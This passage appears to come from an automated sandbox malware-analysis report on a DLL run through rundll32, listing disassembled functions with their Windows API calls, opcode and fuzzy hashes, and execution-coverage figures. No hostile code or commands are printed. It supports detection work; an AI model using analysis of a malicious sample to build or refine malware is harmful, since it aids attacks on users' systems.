                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3016257755-0
                                                                                                                    • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                    • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                    • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                    • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002BC31 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                    • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3384502665-0
                                                                                                                    • Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                    • Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
                                                                                                                    • Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                    • Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1003A545 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                      • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                    • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                    • __lock.LIBCMT ref: 1003A581
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                    • InterlockedIncrement.KERNEL32(00361520), ref: 1003A5C9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2880340415-0
                                                                                                                    • Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                    • Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
                                                                                                                    • Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                    • Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001DC85 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,3F6A93DE), ref: 1001DCB3
                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,3F6A93DE), ref: 1001DCC0
                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,3F6A93DE), ref: 1001DCDB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1078018258-0
                                                                                                                    • Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                    • Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
                                                                                                                    • Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                    • Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100174CD Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                    • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                    • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                    • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                      • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ActiveEnable$FreeResource
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 253586258-0
                                                                                                                    • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                    • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                    • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                    • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002E206 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                    • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                    • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                    • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                      • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                      • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 685759847-0
                                                                                                                    • Opcode ID: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                    • Instruction ID: b81a2157dff59843e5c721b5fa459b83a8bef19e296eb3c7ce89af4ff474d23a
                                                                                                                    • Opcode Fuzzy Hash: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                    • Instruction Fuzzy Hash: 3BE012358D42B4CBFB04FB20ED883A93BE8FB46305F514527D04692165DB346C59DF52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10027CC2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 1473721057-3887548279
                                                                                                                    • Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                    • Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
                                                                                                                    • Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                    • Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100259EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog3
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 431132790-2766056989
                                                                                                                    • Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                    • Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
                                                                                                                    • Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                    • Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001508F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                    • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                      • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                      • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                      • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                      • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                      • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                      • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                    • String ID: %s.dll
                                                                                                                    • API String ID: 3444012488-3668843792
                                                                                                                    • Opcode ID: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                    • Instruction ID: 0816ccb3c2c5dc3d5c2f43fd153125c4ae2bbce82e663fde520804fb1fdab18a
                                                                                                                    • Opcode Fuzzy Hash: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                    • Instruction Fuzzy Hash: 9901B971A10118BBDF09DB74DD96AEEB3B8DF04B01F0105E9EA02DB140EEB1EE448A61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10001FF0 Relevance: 5.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                    • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4100373531-0
                                                                                                                    • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                    • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                    • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                    • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10020B38 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                    • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2949335588-0
                                                                                                                    • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                    • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                    • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                    • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10020E5D Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                    • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                    • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3253506028-0
                                                                                                                    • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                    • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                    • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                    • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100206C8 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                    • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                    • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                    • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Leave$EnterValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3969253408-0
                                                                                                                    • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                    • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                    • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                    • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:15.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:1080
                                                                                                                    Total number of Limit Nodes:17
